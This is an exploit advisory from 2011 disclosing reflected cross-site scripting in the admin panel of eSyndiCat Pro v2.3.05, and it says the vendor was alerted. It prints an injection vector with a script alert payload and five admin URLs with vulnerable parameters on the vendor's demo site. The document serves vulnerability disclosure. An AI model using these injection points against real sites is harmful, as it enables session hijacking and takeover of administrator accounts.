################################################################################################


#  Exploit Title: eSyndiCat Pro v2.3.05  Cross-Site Scripting ( XSS ) 

#  Script Page : http://www.esyndicat.com 
 
#  Date: 24:11:2011

#  Author : RandomStorm  - http://www.randomstorm.com

#  Avram Marius Gabriel (d3v1l)

#  Tested on: Windows XP & Vista (IE9 - Firefox 8.0) 
 
#  Note: Redirect and Html Injection can be performed also 
 
#  Vendor has been alerted !

################################################################################################ 
  


# POC:  
 
# Admin Panel 

# Vector:  "><script>alert('XSS')</script> 

# http://www.esyndicat.com/demo/admin/controller.php?file=admins&do=edit&id=XSS

# http://www.esyndicat.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS

# http://www.esyndicat.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS  

# http://www.esyndicat.com/demo/admin/controller.php?file=suggest-category&id=XSS

# http://www.esyndicat.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS
 
# Screenshot: http://i.imgur.com/bsesB.jpg 


################################################################################################